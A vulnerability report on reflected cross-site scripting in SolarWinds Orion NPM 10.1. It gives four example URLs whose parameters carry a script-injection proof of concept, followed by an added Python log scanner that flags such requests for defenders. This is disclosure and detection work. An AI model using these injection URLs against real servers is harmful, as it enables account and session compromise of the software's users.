SolarWinds Orion NPM version 10.1 suffers from a cross-site scripting vulnerability.
Values placed in the URI are reflected into the page and rendered by the
browser as markup. Orion NPM 10.1 has just been released, so there is no
known fix available yet.
Examples:
Most "variable=" that I've checked are vulnerable:
https://<server>/Orion/NetPerfMon/MapView.aspx?Map=4f89095c-35fa-4b1b-813f-2312700225b7.OrionMap&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E
https://<server>/Orion/NetPerfMon/NodeDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E
https://<server>/Orion/NPM/InterfaceDetails.aspx?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&I:100&view=InterfaceDetails
https://<server>/Orion/NetPerfMon/CustomChart.aspx?ChartName=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&Title=&SubTitle=&SubTitle2=&Width=0&Height=0&NetObject=I:100&CustomPollerID=&Rows=&SampleSize=1M&Period=Yesterday&PlotStyle=&FontSize=1&NetObjectPrefix=I&SubsetColor=&R=YSubsetColor=&ResourceID=57&ShowTrend=True&ReturnTo=
If you need more information please let me know. Is there a template I
should fill out for these reports?
If this is published, please publish under x0skel and NOT my name....
Thanks,
John
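
For defenders, one way to find requests of the kind listed in this report in web server logs, as an added example that is not part of the original report or SolarWinds code. The three-field log layout (client IP, method, request URI), the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# An opening or closing HTML tag inside a decoded parameter value.
# Orion view parameters such as NetObject=N:12 never need one.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]", re.I)

def suspicious_params(request_uri, prefix="/Orion/"):
    """Return [(name, decoded_value)] for query parameters carrying markup."""
    parts = urlsplit(request_uri)
    if not parts.path.lower().startswith(prefix.lower()):
        return []  # only the Orion web console is in scope here
    hits = []
    # parse_qsl percent-decodes each value once (%3C -> "<").
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if MARKUP.search(value):
            hits.append((name, value))
    return hits

def scan(log_lines):
    """Yield (client_ip, path, hits) for each flagged request line."""
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # skip malformed or truncated lines
        ip, _method, uri = fields[:3]
        hits = suspicious_params(uri)
        if hits:
            yield ip, urlsplit(uri).path, hits

# Constructed sample lines (assumed layout); not real traffic.
SAMPLE_LOG = [
    "192.0.2.10 GET /Orion/NetPerfMon/NodeDetails.aspx?NetObject=N:12",
    "192.0.2.44 GET /Orion/NetPerfMon/NodeDetails.aspx"
    "?NetObject=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E",
    "192.0.2.44 GET /Orion/NetPerfMon/CustomChart.aspx?ChartName=AvgRT"
    "&Title=%3Cscript%3Ealert%28%27test%27%29%3C/script%3E&Period=Yesterday",
    "192.0.2.10 GET /images/logo.gif?v=%3Cb%3E",
]

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG):
        print(ip, path, [name for name, _ in hits])
```

Reporting the parameter name alongside the page shows which views receive markup, which is useful when checking whether a later release encodes those values.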